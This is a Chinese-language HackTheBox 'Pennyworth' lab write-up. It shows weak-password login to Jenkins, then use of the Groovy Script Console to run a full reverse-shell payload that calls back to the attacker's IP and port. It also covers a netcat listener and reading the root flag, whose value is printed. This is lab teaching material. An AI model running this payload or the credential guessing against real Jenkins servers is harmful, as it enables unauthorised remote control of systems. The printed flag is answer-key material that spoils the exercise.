HTB:Pennyworth[WriteUP]

目录

连接至HTB服务器并启动靶机

1.What does the acronym CVE stand for?

2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

3.What is the version of the service running on port 8080?

4.What version of Jenkins is running on the target?

5.What type of script is accepted as input on the Jenkins Script Console?

6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

8.What switch should we use with netcat for it to use UDP transport mode?

9.What is the term used to describe making a target host initiate a connection back to the attacker host?

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15


连接至HTB服务器并启动靶机

靶机IP:10.129.235.133

分配IP:10.10.16.12


1.What does the acronym CVE stand for?

CVE 是 Common Vulnerabilities and Exposures(通用漏洞披露)的缩写。

CVE是一个公开的漏洞命名标准。它为已知的安全漏洞和暴露提供统一的标识符,方便安全研究人员、厂商和用户交流和跟踪安全问题,提升网络安全防护水平。


2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

在网络安全中,CIA 三位一体指的是:Confidentiality, Integrity, Availability

保密性(Confidentiality)、完整性(Integrity)和可用性(Availability

保密性确保信息仅被授权的用户访问;完整性保证信息在存储和传输过程中不被篡改;可用性确保授权用户能够随时可靠地访问信息和资源。


3.What is the version of the service running on port 8080?

使用nmap对靶机8080端口进行脚本、服务信息扫描:

nmap -sC -sV -p 8080 {TARGET_IP}

由nmap扫描结果可见,在VERSION栏目下服务信息为:Jetty 9.4.39.v20210325


4.What version of Jenkins is running on the target?

使用浏览器对靶机URL进行访问:http://{TARGET_IP}:8080

自动跳转到了登录界面,直接弱口令爆破后获得账号密码:

账户:root

密码:password

进入后台面板后,在页面右下角可获得Jenkins版本信息:2.289.1


5.What type of script is accepted as input on the Jenkins Script Console?

点击左侧导航栏的:Manage Jenkins

在右侧往下拉,找到:Script Console

打开之后,查看有关脚本控制页面的描述:

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example:

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.

简单的机翻之后:

输入任意 Groovy 脚本并在服务器上执行它。这对于故障排除和诊断很有用。使用 “println” 命令查看输出(如果你使用 System.out,它将输出到服务器的标准输出,这更难看到)。示例:println(Jenkins.instance.pluginManager.plugins)

所有插件中的所有类都是可见的。jenkins.、jenkins.model.、hudson.* 和 hudson.model.* 已预先导入。

从描述中可以看到Jenkins脚本控制台接受Groovy脚本作为输入


6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

在棱角社区可以找到各种类型的脚本Reverse_Shell:(附上链接)

[~]#棱角 ::Edge.Forum*

String host="{NATIVE_IP}";
int port={NATIVE_PORT};
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);
try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

如果靶机是Windows机器的话,String cmd字段需要修改为:"cmd.exe"


7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

这题就是常识题目:ifconfig,在命令后加上-a参数是展示所有网络接口

ifconfig -a

可以看到我的tun0接口IP是:10.10.16.12


8.What switch should we use with netcat for it to use UDP transport mode?

查看netcat的使用选项:

nc -h

可以看到:-u 参数用于netcat使用UDP传输模式


9.What is the term used to describe making a target host initiate a connection back to the attacker host?

payload中的端口自己设定,所以我自己的完整payload:

String host="10.10.16.12";
int port=1425;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);
try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

使用nc开启端口监听,在Script Console端运行脚本获得反弹shell(reverse shell):


利用script启动一个交互shell:

script /dev/null -c bash

最后在/root目录中找到了flag.txt,或者直接执行命令查看:

cat /root/flag.txt

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15

上一篇:Python面向对象编程:属性和方法②


下一篇:强引用、软引用、弱引用、虚引用的区别-总结